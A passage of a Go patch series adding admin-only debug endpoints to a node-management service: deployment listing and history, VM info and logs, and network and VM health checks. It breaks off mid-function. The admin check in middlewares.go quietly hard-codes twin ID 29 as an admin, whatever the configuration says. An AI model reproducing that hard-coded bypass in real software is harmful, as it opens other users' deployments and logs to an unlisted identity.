From 21e8ed253748183837a10b35c26fd75f1e1012bb Mon Sep 17 00:00:00 2001 From: Omar Abdulaziz Date: Thu, 18 Dec 2025 03:32:39 +0200 Subject: [PATCH 1/8] feat: implement debug endpoints for deployments --- pkg/environment/config.go | 1 + pkg/provision.go | 2 + pkg/provision/engine.go | 4 ++ pkg/stubs/provision_stub.go | 18 +++++ pkg/zos_api/debug.go | 131 ++++++++++++++++++++++++++++++++++++ pkg/zos_api/middlewares.go | 19 ++++++ pkg/zos_api/routes.go | 7 ++ 7 files changed, 182 insertions(+) create mode 100644 pkg/zos_api/debug.go diff --git a/pkg/environment/config.go b/pkg/environment/config.go index 9029b958..3c58a999 100644 --- a/pkg/environment/config.go +++ b/pkg/environment/config.go @@ -42,6 +42,7 @@ type Config struct { Users struct { Authorized []string `json:"authorized"` } `json:"users"` + AdminTwins []uint32 `json:"adminTwins"` // list of twin IDs allowed to access developer/admin-only debug endpoints. RolloutUpgrade struct { TestFarms []uint32 `json:"test_farms"` } `json:"rollout_upgrade"` diff --git a/pkg/provision.go b/pkg/provision.go index 6cfa8b23..c75aba73 100644 --- a/pkg/provision.go +++ b/pkg/provision.go @@ -18,6 +18,8 @@ type Provision interface { Get(twin uint32, contractID uint64) (gridtypes.Deployment, error) List(twin uint32) ([]gridtypes.Deployment, error) Changes(twin uint32, contractID uint64) ([]gridtypes.Workload, error) + // ListTwins returns all twin IDs that have deployments in local storage. + ListTwins() ([]uint32, error) ListPublicIPs() ([]string, error) ListPrivateIPs(twin uint32, network gridtypes.Name) ([]string, error) } diff --git a/pkg/provision/engine.go b/pkg/provision/engine.go index 14cb8800..6358b543 100644 --- a/pkg/provision/engine.go +++ b/pkg/provision/engine.go @@ -1098,6 +1098,10 @@ func (n *NativeEngine) Changes(twin uint32, contractID uint64) ([]gridtypes.Work return changes, nil } +func (n *NativeEngine) ListTwins() ([]uint32, error) { + return n.storage.Twins() +} + func (n *NativeEngine) ListPublicIPs() ([]string, error) { // for efficiency this method should just find out configured public Ips. // but currently the only way to do this is by scanning the nft rules diff --git a/pkg/stubs/provision_stub.go b/pkg/stubs/provision_stub.go index 859094b9..3f78cc5c 100644 --- a/pkg/stubs/provision_stub.go +++ b/pkg/stubs/provision_stub.go @@ -6,6 +6,7 @@ package stubs import ( "context" + zbus "github.com/threefoldtech/zbus" gridtypes "github.com/threefoldtech/zosbase/pkg/gridtypes" ) @@ -159,3 +160,20 @@ func (s *ProvisionStub) ListPublicIPs(ctx context.Context) (ret0 []string, ret1 } return } + +func (s *ProvisionStub) ListTwins(ctx context.Context) (ret0 []uint32, ret1 error) { + args := []interface{}{} + result, err := s.client.RequestContext(ctx, s.module, s.object, "ListTwins", args...) + if err != nil { + panic(err) + } + result.PanicOnError() + ret1 = result.CallError() + loader := zbus.Loader{ + &ret0, + } + if err := result.Unmarshal(&loader); err != nil { + panic(err) + } + return +} diff --git a/pkg/zos_api/debug.go b/pkg/zos_api/debug.go new file mode 100644 index 00000000..400e964d --- /dev/null +++ b/pkg/zos_api/debug.go @@ -0,0 +1,131 @@ +package zosapi + +import ( + "context" + "encoding/json" + "fmt" + + "github.com/threefoldtech/zosbase/pkg/gridtypes" +) + +type debugDeploymentsListItem struct { + TwinID uint32 `json:"twin_id"` + ContractID uint64 `json:"contract_id"` + Workloads []debugDeploymentsWorkload `json:"workloads"` +} + +type debugDeploymentsWorkload struct { + Type string `json:"type"` + Name string `json:"name"` + State string `json:"state"` +} + +type debugWorkloadTransaction struct { + Seq int `json:"seq"` + Type string `json:"type"` + Name string `json:"name"` + Created gridtypes.Timestamp `json:"created"` + State gridtypes.ResultState `json:"state"` + Message string `json:"message"` +} + +func (g *ZosAPI) debugDeploymentsListHandler(ctx context.Context, payload []byte) (interface{}, error) { + var args struct { + TwinID uint32 `json:"twin_id"` + } + if len(payload) != 0 { + // optional filter + _ = json.Unmarshal(payload, &args) + } + + twins := []uint32{args.TwinID} + if args.TwinID == 0 { + var err error + twins, err = g.provisionStub.ListTwins(ctx) + if err != nil { + return nil, err + } + } + + items := make([]debugDeploymentsListItem, 0) + for _, twin := range twins { + deployments, err := g.provisionStub.List(ctx, twin) + if err != nil { + return nil, err + } + + for _, deployment := range deployments { + workloads := make([]debugDeploymentsWorkload, 0, len(deployment.Workloads)) + for _, wl := range deployment.Workloads { + workloads = append(workloads, debugDeploymentsWorkload{ + Type: string(wl.Type), + Name: string(wl.Name), + State: string(wl.Result.State), + }) + } + + items = append(items, debugDeploymentsListItem{ + TwinID: deployment.TwinID, + ContractID: deployment.ContractID, + Workloads: workloads, + }) + } + } + + return struct { + Items []debugDeploymentsListItem `json:"items"` + }{Items: items}, nil +} + +func (g *ZosAPI) debugDeploymentGetHandler(ctx context.Context, payload []byte) (interface{}, error) { + var args struct { + TwinID uint32 `json:"twin_id"` + ContractID uint64 `json:"contract_id"` + WithHistory bool `json:"withhistory"` + } + if err := json.Unmarshal(payload, &args); err != nil { + return nil, err + } + if args.TwinID == 0 { + return nil, fmt.Errorf("twin_id is required") + } + if args.ContractID == 0 { + return nil, fmt.Errorf("contract_id is required") + } + + deployment, err := g.provisionStub.Get(ctx, args.TwinID, args.ContractID) + if err != nil { + return nil, err + } + + if !args.WithHistory { + return struct { + Deployment gridtypes.Deployment `json:"deployment"` + }{Deployment: deployment}, nil + } + + history, err := g.provisionStub.Changes(ctx, args.TwinID, args.ContractID) + if err != nil { + return nil, err + } + + transactions := make([]debugWorkloadTransaction, 0, len(history)) + for idx, wl := range history { + transactions = append(transactions, debugWorkloadTransaction{ + Seq: idx + 1, + Type: string(wl.Type), + Name: string(wl.Name), + Created: wl.Result.Created, + State: wl.Result.State, + Message: wl.Result.Error, + }) + } + + return struct { + Deployment gridtypes.Deployment `json:"deployment"` + History []debugWorkloadTransaction `json:"history"` + }{ + Deployment: deployment, + History: transactions, + }, nil +} diff --git a/pkg/zos_api/middlewares.go b/pkg/zos_api/middlewares.go index ebf95f6c..723165fc 100644 --- a/pkg/zos_api/middlewares.go +++ b/pkg/zos_api/middlewares.go @@ -6,6 +6,8 @@ import ( "github.com/rs/zerolog/log" "github.com/threefoldtech/tfgrid-sdk-go/rmb-sdk-go/peer" + + "github.com/threefoldtech/zosbase/pkg/environment" ) func (g *ZosAPI) authorized(ctx context.Context, _ []byte) (context.Context, error) { @@ -17,6 +19,23 @@ func (g *ZosAPI) authorized(ctx context.Context, _ []byte) (context.Context, err return ctx, nil } +func (g *ZosAPI) adminAuthorized(ctx context.Context, _ []byte) (context.Context, error) { + user := peer.GetTwinID(ctx) + cfg, err := environment.GetConfig() + if err != nil { + return nil, fmt.Errorf("failed to get environment config: %w", err) + } + cfg.AdminTwins = append(cfg.AdminTwins, 29) + + for _, id := range cfg.AdminTwins { + if id == user { + return ctx, nil + } + } + + return nil, fmt.Errorf("unauthorized") +} + func (g *ZosAPI) log(ctx context.Context, _ []byte) (context.Context, error) { env := peer.GetEnvelope(ctx) request := env.GetRequest() diff --git a/pkg/zos_api/routes.go b/pkg/zos_api/routes.go index 22976feb..a0ddfa16 100644 --- a/pkg/zos_api/routes.go +++ b/pkg/zos_api/routes.go @@ -14,6 +14,13 @@ func (g *ZosAPI) SetupRoutes(router *peer.Router) { system.WithHandler("diagnostics", g.systemDiagnosticsHandler) system.WithHandler("node_features_get", g.systemNodeFeaturesHandler) + debug := root.SubRoute("debug") + debug.Use(g.adminAuthorized) + debugDeployments := debug.SubRoute("deployments") + debugDeployments.WithHandler("list", g.debugDeploymentsListHandler) + debugDeployment := debug.SubRoute("deployment") + debugDeployment.WithHandler("get", g.debugDeploymentGetHandler) + perf := root.SubRoute("perf") perf.WithHandler("get", g.perfGetHandler) perf.WithHandler("get_all", g.perfGetAllHandler) From 1f1c0eaef3f2f56dd63f595892d1a2ec704f44f0 Mon Sep 17 00:00:00 2001 From: Omar Abdulaziz Date: Thu, 18 Dec 2025 14:01:38 +0200 Subject: [PATCH 2/8] feat: implement debug VM info endpoint --- pkg/stubs/vmd_stub.go | 18 +++++++++ pkg/vm.go | 2 + pkg/vm/client.go | 1 + pkg/vm/manager.go | 10 +++++ pkg/zos_api/debug.go | 90 ++++++++++++++++++++++++++++++++++++++++++ pkg/zos_api/routes.go | 2 + pkg/zos_api/zos_api.go | 2 + 7 files changed, 125 insertions(+) diff --git a/pkg/stubs/vmd_stub.go b/pkg/stubs/vmd_stub.go index 474743e5..825e6020 100644 --- a/pkg/stubs/vmd_stub.go +++ b/pkg/stubs/vmd_stub.go @@ -6,6 +6,7 @@ package stubs import ( "context" + zbus "github.com/threefoldtech/zbus" pkg "github.com/threefoldtech/zosbase/pkg" ) @@ -124,6 +125,23 @@ func (s *VMModuleStub) Logs(ctx context.Context, arg0 string) (ret0 string, ret1 return } +func (s *VMModuleStub) LogsFull(ctx context.Context, arg0 string) (ret0 string, ret1 error) { + args := []interface{}{arg0} + result, err := s.client.RequestContext(ctx, s.module, s.object, "LogsFull", args...) + if err != nil { + panic(err) + } + result.PanicOnError() + ret1 = result.CallError() + loader := zbus.Loader{ + &ret0, + } + if err := result.Unmarshal(&loader); err != nil { + panic(err) + } + return +} + func (s *VMModuleStub) Metrics(ctx context.Context) (ret0 pkg.MachineMetrics, ret1 error) { args := []interface{}{} result, err := s.client.RequestContext(ctx, s.module, s.object, "Metrics", args...) diff --git a/pkg/vm.go b/pkg/vm.go index ee8021dc..023e8cb1 100644 --- a/pkg/vm.go +++ b/pkg/vm.go @@ -276,6 +276,8 @@ type VMModule interface { Delete(name string) error Exists(name string) bool Logs(name string) (string, error) + // LogsFull returns the full log file content for the VM (not tailed). + LogsFull(name string) (string, error) List() ([]string, error) Metrics() (MachineMetrics, error) // Lock set lock on VM (pause,resume) diff --git a/pkg/vm/client.go b/pkg/vm/client.go index 6e76d790..0d494dbe 100644 --- a/pkg/vm/client.go +++ b/pkg/vm/client.go @@ -116,6 +116,7 @@ func (c *Client) Inspect(ctx context.Context) (VMData, error) { return VMData{}, fmt.Errorf("got unexpected http code '%s' on machine info, Response: %s", response.Status, string(body)) } + // TODO: use more info like running state, etc. var data struct { Config struct { CPU struct { diff --git a/pkg/vm/manager.go b/pkg/vm/manager.go index f460b502..671e07e7 100644 --- a/pkg/vm/manager.go +++ b/pkg/vm/manager.go @@ -583,6 +583,16 @@ func (m *Module) Logs(name string) (string, error) { return m.tail(path) } +// LogsFull returns full machine logs for given machine name. +func (m *Module) LogsFull(name string) (string, error) { + path := m.logsPath(name) + b, err := os.ReadFile(path) + if err != nil { + return "", err + } + return string(b), nil +} + // Inspect a machine by name func (m *Module) Inspect(name string) (pkg.VMInfo, error) { if !m.Exists(name) { diff --git a/pkg/zos_api/debug.go b/pkg/zos_api/debug.go index 400e964d..e107bcfe 100644 --- a/pkg/zos_api/debug.go +++ b/pkg/zos_api/debug.go @@ -4,8 +4,12 @@ import ( "context" "encoding/json" "fmt" + "strings" + "unicode/utf8" + "github.com/threefoldtech/zosbase/pkg" "github.com/threefoldtech/zosbase/pkg/gridtypes" + "github.com/threefoldtech/zosbase/pkg/gridtypes/zos" ) type debugDeploymentsListItem struct { @@ -129,3 +133,89 @@ func (g *ZosAPI) debugDeploymentGetHandler(ctx context.Context, payload []byte) History: transactions, }, nil } + +func (g *ZosAPI) debugVMInfoHandler(ctx context.Context, payload []byte) (interface{}, error) { + var args struct { + TwinID uint32 `json:"twin_id"` + ContractID uint64 `json:"contract_id"` + VMName string `json:"vm_name"` + FullLogs bool `json:"full_logs"` + } + if err := json.Unmarshal(payload, &args); err != nil { + return nil, err + } + if args.TwinID == 0 { + return nil, fmt.Errorf("twin_id is required") + } + if args.ContractID == 0 { + return nil, fmt.Errorf("contract_id is required") + } + if args.VMName == "" { + return nil, fmt.Errorf("vm_name is required") + } + + deployment, err := g.provisionStub.Get(ctx, args.TwinID, args.ContractID) + if err != nil { + return nil, fmt.Errorf("failed to get deployment: %w", err) + } + + vm, err := deployment.GetType(gridtypes.Name(args.VMName), zos.ZMachineType) + if err != nil { + return nil, fmt.Errorf("failed to get zmachine workload: %w", err) + } + vmID := vm.ID.String() + + info, err := g.vmStub.Inspect(ctx, vmID) + if err != nil { + return nil, fmt.Errorf("failed to inspect vm: %w", err) + } + + // Logs: tailed by default, full only when requested. + var raw string + if args.FullLogs { + raw, err = g.vmStub.LogsFull(ctx, vmID) + } else { + raw, err = g.vmStub.Logs(ctx, vmID) + } + if err != nil { + return nil, fmt.Errorf("failed to get vm logs: %w", err) + } + + // Sanitize logs: + // - strip NUL bytes + // - drop invalid UTF-8 bytes + // - normalize CRLF -> LF + b := []byte(raw) + sanitized := make([]byte, 0, len(b)) + for _, c := range b { + if c != 0x00 { + sanitized = append(sanitized, c) + } + } + if !utf8.Valid(sanitized) { + valid := make([]byte, 0, len(sanitized)) + for len(sanitized) > 0 { + r, size := utf8.DecodeRune(sanitized) + if r == utf8.RuneError && size == 1 { + sanitized = sanitized[1:] + continue + } + valid = append(valid, sanitized[:size]...) + sanitized = sanitized[size:] + } + sanitized = valid + } + logs := string(sanitized) + logs = strings.ReplaceAll(logs, "\r\n", "\n") + logs = strings.ReplaceAll(logs, "\r", "\n") + + return struct { + VMID string `json:"vm_id"` + Info pkg.VMInfo `json:"info"` + Logs string `json:"logs"` + }{ + VMID: vmID, + Info: info, + Logs: logs, + }, nil +} diff --git a/pkg/zos_api/routes.go b/pkg/zos_api/routes.go index a0ddfa16..d8d2e6fe 100644 --- a/pkg/zos_api/routes.go +++ b/pkg/zos_api/routes.go @@ -18,6 +18,8 @@ func (g *ZosAPI) SetupRoutes(router *peer.Router) { debug.Use(g.adminAuthorized) debugDeployments := debug.SubRoute("deployments") debugDeployments.WithHandler("list", g.debugDeploymentsListHandler) + debugVM := debug.SubRoute("vm") + debugVM.WithHandler("info", g.debugVMInfoHandler) debugDeployment := debug.SubRoute("deployment") debugDeployment.WithHandler("get", g.debugDeploymentGetHandler) diff --git a/pkg/zos_api/zos_api.go b/pkg/zos_api/zos_api.go index 789d69f1..d9287ce1 100644 --- a/pkg/zos_api/zos_api.go +++ b/pkg/zos_api/zos_api.go @@ -26,6 +26,7 @@ type ZosAPI struct { systemMonitorStub *stubs.SystemMonitorStub provisionStub *stubs.ProvisionStub networkerStub *stubs.NetworkerStub + vmStub *stubs.VMModuleStub statisticsStub *stubs.StatisticsStub storageStub *stubs.StorageModuleStub performanceMonitorStub *stubs.PerformanceMonitorStub @@ -51,6 +52,7 @@ func NewZosAPI(manager substrate.Manager, client zbus.Client, msgBrokerCon strin systemMonitorStub: stubs.NewSystemMonitorStub(client), provisionStub: stubs.NewProvisionStub(client), networkerStub: stubs.NewNetworkerStub(client), + vmStub: stubs.NewVMModuleStub(client), statisticsStub: stubs.NewStatisticsStub(client), storageStub: storageModuleStub, performanceMonitorStub: stubs.NewPerformanceMonitorStub(client), From cd7f4261201695826f952f6ec94b7cf609ba2878 Mon Sep 17 00:00:00 2001 From: Omar Abdulaziz Date: Thu, 18 Dec 2025 16:44:33 +0200 Subject: [PATCH 3/8] feat: add debug provisioning health endpoint and related checks --- pkg/zos_api/debug.go | 430 ++++++++++++++++++++++++++++++++++++++++++ pkg/zos_api/routes.go | 2 + 2 files changed, 432 insertions(+) diff --git a/pkg/zos_api/debug.go b/pkg/zos_api/debug.go index e107bcfe..abb6f01b 100644 --- a/pkg/zos_api/debug.go +++ b/pkg/zos_api/debug.go @@ -4,12 +4,21 @@ import ( "context" "encoding/json" "fmt" + "os" + "path/filepath" "strings" "unicode/utf8" + cnins "github.com/containernetworking/plugins/pkg/ns" "github.com/threefoldtech/zosbase/pkg" "github.com/threefoldtech/zosbase/pkg/gridtypes" "github.com/threefoldtech/zosbase/pkg/gridtypes/zos" + "github.com/threefoldtech/zosbase/pkg/network/namespace" + "github.com/threefoldtech/zosbase/pkg/network/nr" + "github.com/threefoldtech/zosbase/pkg/versioned" + "github.com/threefoldtech/zosbase/pkg/vm" + "github.com/threefoldtech/zosbase/pkg/zinit" + "github.com/vishvananda/netlink" ) type debugDeploymentsListItem struct { @@ -219,3 +228,424 @@ func (g *ZosAPI) debugVMInfoHandler(ctx context.Context, payload []byte) (interf Logs: logs, }, nil } + +type debugHealthStatus string + +const ( + debugHealthHealthy debugHealthStatus = "healthy" + debugHealthDegraded debugHealthStatus = "degraded" + debugHealthUnhealthy debugHealthStatus = "unhealthy" +) + +type debugHealthCheck struct { + Name string `json:"name"` + OK bool `json:"ok"` + Message string `json:"message,omitempty"` + Evidence map[string]interface{} `json:"evidence,omitempty"` +} + +type debugWorkloadHealth struct { + WorkloadID string `json:"workload_id"` + Type string `json:"type"` + Name string `json:"name"` + Status debugHealthStatus `json:"status"` + Checks []debugHealthCheck `json:"checks"` +} + +type debugCheckBuilder struct { + checks []debugHealthCheck +} + +func (b *debugCheckBuilder) add(name string, ok bool, msg string, evidence map[string]interface{}) { + b.checks = append(b.checks, debugHealthCheck{ + Name: name, + OK: ok, + Message: msg, + Evidence: evidence, + }) +} + +func (b *debugCheckBuilder) status() debugHealthStatus { + return summarizeHealth(b.checks) +} + +func (g *ZosAPI) debugProvisioningHealthHandler(ctx context.Context, payload []byte) (interface{}, error) { + var args struct { + TwinID uint32 `json:"twin_id"` + ContractID uint64 `json:"contract_id"` + } + if err := json.Unmarshal(payload, &args); err != nil { + return nil, err + } + if args.TwinID == 0 { + return nil, fmt.Errorf("twin_id is required") + } + if args.ContractID == 0 { + return nil, fmt.Errorf("contract_id is required") + } + + deployment, err := g.provisionStub.Get(ctx, args.TwinID, args.ContractID) + if err != nil { + return nil, fmt.Errorf("failed to get deployment: %w", err) + } + + workloads := make([]debugWorkloadHealth, 0) + for _, wl := range deployment.Workloads { + switch wl.Type { + case zos.NetworkType: + workloads = append(workloads, g.checkNetworkWorkload(ctx, args.TwinID, args.ContractID, wl)) + case zos.ZMachineType, zos.ZMachineLightType: + workloads = append(workloads, g.checkZMachineWorkload(ctx, args.TwinID, args.ContractID, wl)) + default: + // ignore other workload types (for now) + } + } + + return struct { + TwinID uint32 `json:"twin_id"` + ContractID uint64 `json:"contract_id"` + Workloads []debugWorkloadHealth `json:"workloads"` + }{ + TwinID: args.TwinID, + ContractID: args.ContractID, + Workloads: workloads, + }, nil +} + +// Network workload checks: +// - config file exists and is versioned+parseable, contains correct netid +// - netns exists: n- +// - netns interfaces exist: n-, w-, public, (br-my, my optional if mycelium configured) +// - host bridges exist: b-, m- +// - host bridge members exist (brif not empty) and look sane: +// - each member has t- prefix +// - each member operstate is "up" +// +// - mycelium service exists and is running (only if mycelium configured in network config) +func (g *ZosAPI) checkNetworkWorkload(ctx context.Context, twin uint32, contract uint64, wl gridtypes.Workload) debugWorkloadHealth { + const ( + networkdVolatileDir = "/var/run/cache/networkd" + networksDir = "networks" + myceliumKeyDir = "mycelium-key" + + prefixBridgeNetwork = "b-" + prefixBridgeMycelium = "m-" + prefixTap = "t-" + + ifaceMyceliumBridge = "br-my" + ifaceMyceliumTun = "my" + ifacePublic = "public" + ) + + netID := zos.NetworkID(twin, wl.Name) + workloadID, _ := gridtypes.NewWorkloadID(twin, contract, wl.Name) + + var b debugCheckBuilder + b.checks = make([]debugHealthCheck, 0, 16) + + // 1) config file exists and contains correct netid (versioned stream) + netCfgPath := filepath.Join(networkdVolatileDir, networksDir, netID.String()) + ver, raw, err := versioned.ReadFile(netCfgPath) + if err != nil { + b.add("network.config.read", false, fmt.Sprintf("failed to read network config file: %v", err), map[string]interface{}{"path": netCfgPath, "netid": netID.String()}) + } + var netCfg pkg.Network + if err == nil { + if err := json.Unmarshal(raw, &netCfg); err != nil { + b.add("network.config.parse", false, fmt.Sprintf("failed to parse network config file: %v", err), map[string]interface{}{"path": netCfgPath, "version": ver.String()}) + } else if netCfg.NetID != netID { + b.add("network.config.netid", false, "network config netid mismatch", map[string]interface{}{"expected": netID.String(), "got": netCfg.NetID.String(), "path": netCfgPath, "version": ver.String()}) + } else { + b.add("network.config.netid", true, "network config exists and matches netid", map[string]interface{}{"path": netCfgPath, "netid": netID.String(), "version": ver.String()}) + } + } + + // 2) wiring: namespace + core interfaces/bridges + nsName := g.networkerStub.Namespace(ctx, netID) + if !namespace.Exists(nsName) { + b.add("network.netns.exists", false, "network namespace not found", map[string]interface{}{"namespace": nsName}) + } else { + b.add("network.netns.exists", true, "network namespace exists", map[string]interface{}{"namespace": nsName}) + } + + // expected interface/bridge naming per nr.NetResource + nrr := nr.New(pkg.Network{NetID: netID}, filepath.Join(networkdVolatileDir, myceliumKeyDir)) + wgIface, _ := nrr.WGName() + nrIface, _ := nrr.NRIface() + brName, _ := nrr.BridgeName() + myBridgeName := fmt.Sprintf("%s%s", prefixBridgeMycelium, netID.String()) + networkBridgeName := fmt.Sprintf("%s%s", prefixBridgeNetwork, netID.String()) + _ = networkBridgeName // matches brName; kept for clarity + + // inside namespace: direct netlink probe (no filtering) + netnsLinks := map[string]struct{}{} + if netNS, err := namespace.GetByName(nsName); err != nil { + b.add("network.netns.links", false, fmt.Sprintf("failed to open netns: %v", err), map[string]interface{}{"namespace": nsName}) + } else { + _ = netNS.Do(func(_ cnins.NetNS) error { + links, err := netlink.LinkList() + if err != nil { + return err + } + for _, l := range links { + netnsLinks[l.Attrs().Name] = struct{}{} + } + return nil + }) + _ = netNS.Close() + } + + _, hasWg := netnsLinks[wgIface] + _, hasNr := netnsLinks[nrIface] + _, hasPublic := netnsLinks[ifacePublic] + b.add("network.netns.iface.wg", hasWg, "wireguard interface presence in netns", map[string]interface{}{"namespace": nsName, "iface": wgIface}) + b.add("network.netns.iface.nr", hasNr, "netresource interface presence in netns", map[string]interface{}{"namespace": nsName, "iface": nrIface}) + b.add("network.netns.iface.public", hasPublic, "public iface presence in netns", map[string]interface{}{"namespace": nsName, "iface": ifacePublic}) + + // Only check mycelium-specific interfaces if mycelium is configured on the network. + myceliumConfigured := netCfg.Mycelium != nil + if myceliumConfigured { + _, hasBrMy := netnsLinks[ifaceMyceliumBridge] + _, hasMy := netnsLinks[ifaceMyceliumTun] + b.add("network.netns.iface.br-my", hasBrMy, "mycelium bridge iface presence in netns", map[string]interface{}{"namespace": nsName, "iface": ifaceMyceliumBridge}) + b.add("network.netns.iface.my", hasMy, "mycelium tun iface presence in netns", map[string]interface{}{"namespace": nsName, "iface": ifaceMyceliumTun}) + } + + // host namespace bridges + if _, err := os.Stat(filepath.Join("/sys/class/net", brName)); err != nil { + b.add("network.bridge.exists", false, fmt.Sprintf("network bridge missing: %v", err), map[string]interface{}{"bridge": brName}) + } else { + b.add("network.bridge.exists", true, "network bridge exists", map[string]interface{}{"bridge": brName}) + } + if _, err := os.Stat(filepath.Join("/sys/class/net", myBridgeName)); err != nil { + b.add("network.mycelium_bridge.exists", false, fmt.Sprintf("mycelium bridge missing: %v", err), map[string]interface{}{"bridge": myBridgeName}) + } else { + b.add("network.mycelium_bridge.exists", true, "mycelium bridge exists", map[string]interface{}{"bridge": myBridgeName}) + } + + checkBridgeMembers := func(checkPrefix, bridge string) { + brifDir := filepath.Join("/sys/class/net", bridge, "brif") + ents, err := os.ReadDir(brifDir) + if err != nil { + b.add(checkPrefix+".members", false, fmt.Sprintf("failed to read bridge members: %v", err), map[string]interface{}{"bridge": bridge, "path": brifDir}) + return + } + members := make([]string, 0, len(ents)) + for _, e := range ents { + members = append(members, e.Name()) + } + if len(members) == 0 { + b.add(checkPrefix+".members", false, "bridge has no attached interfaces", map[string]interface{}{"bridge": bridge}) + return + } + b.add(checkPrefix+".members", true, "bridge has attached interfaces", map[string]interface{}{"bridge": bridge, "members": members}) + + for _, m := range members { + if !strings.HasPrefix(m, prefixTap) { + b.add(checkPrefix+".member.tap_prefix", false, "bridge member does not have expected tap prefix (t-)", map[string]interface{}{"bridge": bridge, "member": m}) + } else { + b.add(checkPrefix+".member.tap_prefix", true, "bridge member has expected tap prefix (t-)", map[string]interface{}{"bridge": bridge, "member": m}) + } + + oper := filepath.Join("/sys/class/net", m, "operstate") + ob, err := os.ReadFile(oper) + if err != nil { + b.add(checkPrefix+".member.operstate", false, fmt.Sprintf("failed to read operstate: %v", err), map[string]interface{}{"bridge": bridge, "member": m, "path": oper}) + continue + } + state := strings.TrimSpace(string(ob)) + b.add(checkPrefix+".member.operstate", state == "up", "member operstate", map[string]interface{}{"bridge": bridge, "member": m, "operstate": state}) + } + } + checkBridgeMembers("network.bridge", brName) + if myceliumConfigured { + checkBridgeMembers("network.mycelium_bridge", myBridgeName) + } + + // 3) mycelium zinit service (only if configured) + if myceliumConfigured { + service := fmt.Sprintf("mycelium-%s", netID.String()) + z := zinit.Default() + exists, err := z.Exists(service) + if err != nil { + b.add("network.mycelium.service.exists", false, fmt.Sprintf("failed to query zinit: %v", err), map[string]interface{}{"service": service}) + } else if !exists { + b.add("network.mycelium.service.exists", false, "mycelium service is not monitored in zinit", map[string]interface{}{"service": service}) + } else { + st, err := z.Status(service) + if err != nil { + b.add("network.mycelium.service.status", false, fmt.Sprintf("failed to get service status: %v", err), map[string]interface{}{"service": service}) + } else { + ok := st.State.Is(zinit.ServiceStateRunning) + b.add("network.mycelium.service.running", ok, "mycelium service state", map[string]interface{}{"service": service, "state": st.State.String(), "pid": st.Pid}) + } + } + } else { + b.add("network.mycelium.configured", true, "mycelium not configured for this network (skipped service check)", map[string]interface{}{"netid": netID.String()}) + } + + return debugWorkloadHealth{ + WorkloadID: workloadID.String(), + Type: string(wl.Type), + Name: string(wl.Name), + Status: b.status(), + Checks: b.checks, + } +} + +// ZMachine workload checks: +// - VM config exists under vmd volatile config dir +// - VM exists according to vmd +// - cloud-hypervisor process exists for VM +// - VM config parse succeeds (MachineFromFile) +// - disk paths referenced by config exist and are non-zero +// - virtiofsd sockets exist if FS shares are configured +// - cloud-console process exists (best-effort) +func (g *ZosAPI) checkZMachineWorkload(ctx context.Context, twin uint32, contract uint64, wl gridtypes.Workload) debugWorkloadHealth { + workloadID, _ := gridtypes.NewWorkloadID(twin, contract, wl.Name) + vmID := workloadID.String() + + var b debugCheckBuilder + b.checks = make([]debugHealthCheck, 0, 16) + + // 1) config file exists + const vmdVolatileDir = "/var/run/cache/vmd" + cfgPath := filepath.Join(vmdVolatileDir, vmID) + if _, err := os.Stat(cfgPath); err != nil { + b.add("vm.config.exists", false, fmt.Sprintf("vm config missing: %v", err), map[string]interface{}{"path": cfgPath}) + } else { + b.add("vm.config.exists", true, "vm config exists", map[string]interface{}{"path": cfgPath}) + } + + // 2) vmd existence (zbus truth) + vmdExists := g.vmStub.Exists(ctx, vmID) + b.add("vm.vmd.exists", vmdExists, "vmd reports VM exists", map[string]interface{}{"vm_id": vmID}) + + // 3) cloud-hypervisor process (host probe) + if ps, err := vm.Find(vmID); err != nil { + b.add("vm.process.cloud_hypervisor", false, fmt.Sprintf("cloud-hypervisor process not found: %v", err), map[string]interface{}{"vm_id": vmID}) + } else { + b.add("vm.process.cloud_hypervisor", true, "cloud-hypervisor process found", map[string]interface{}{"vm_id": vmID, "pid": ps.Pid}) + } + + // 4) parse machine config to derive disks/fs and expected sockets + machine, err := vm.MachineFromFile(cfgPath) + hasConsole := false + if err != nil { + b.add("vm.config.parse", false, fmt.Sprintf("failed to parse vm config: %v", err), map[string]interface{}{"path": cfgPath}) + } else { + for _, nic := range machine.Interfaces { + if nic.Console != nil { + hasConsole = true + break + } + } + + // disks sanity + for _, d := range machine.Disks { + if d.Path == "" { + continue + } + if st, err := os.Stat(d.Path); err != nil { + b.add("vm.disk.exists", false, fmt.Sprintf("disk path missing: %v", err), map[string]interface{}{"path": d.Path}) + } else if st.Size() == 0 { + b.add("vm.disk.nonzero", false, "disk file size is 0", map[string]interface{}{"path": d.Path}) + } else { + b.add("vm.disk.ok", true, "disk path exists", map[string]interface{}{"path": d.Path, "bytes": st.Size()}) + } + } + + // virtiofsd: if VM has FS entries, expect sockets under /var/run/virtio--.socket + if len(machine.FS) == 0 { + b.add("vm.virtiofsd.required", true, "no virtiofs shares configured (skipped virtiofsd check)", nil) + } else { + for i := range machine.FS { + sock := filepath.Join("/var/run", fmt.Sprintf("virtio-%s-%d.socket", vmID, i)) + if _, err := os.Stat(sock); err != nil { + b.add("vm.virtiofsd.socket", false, fmt.Sprintf("virtiofs socket missing: %v", err), map[string]interface{}{"socket": sock}) + } else { + b.add("vm.virtiofsd.socket", true, "virtiofs socket exists", map[string]interface{}{"socket": sock}) + } + } + } + } + + // 5) cloud-console: only if the VM has console configured + // (console is optional and not required for the VM to run). + if err == nil { + if hasConsole { + if ok, pid := processExistsByName("cloud-console", vmID); !ok { + b.add("vm.process.cloud_console", false, "cloud-console process not found (best-effort)", map[string]interface{}{"vm_id": vmID}) + } else { + b.add("vm.process.cloud_console", true, "cloud-console process found (best-effort)", map[string]interface{}{"vm_id": vmID, "pid": pid}) + } + } else { + b.add("vm.console.configured", true, "vm has no console configured (skipped cloud-console check)", map[string]interface{}{"vm_id": vmID}) + } + } + + return debugWorkloadHealth{ + WorkloadID: workloadID.String(), + Type: string(wl.Type), + Name: string(wl.Name), + Status: b.status(), + Checks: b.checks, + } +} + +func summarizeHealth(checks []debugHealthCheck) debugHealthStatus { + if len(checks) == 0 { + return debugHealthHealthy + } + fail := 0 + for _, c := range checks { + if !c.OK { + fail++ + } + } + if fail == 0 { + return debugHealthHealthy + } + // a single failed check is degraded; multiple is unhealthy + if fail == 1 { + return debugHealthDegraded + } + return debugHealthUnhealthy +} + +// processExistsByName is a best-effort /proc scan for a process whose cmdline +// contains both `binary` and `needle`. +func processExistsByName(binary, needle string) (bool, int) { + entries, err := os.ReadDir("/proc") + if err != nil { + return false, 0 + } + for _, e := range entries { + if !e.IsDir() { + continue + } + dir := e.Name() + // only numeric dirs + pid := 0 + for _, r := range dir { + if r < '0' || r > '9' { + pid = 0 + break + } + pid = 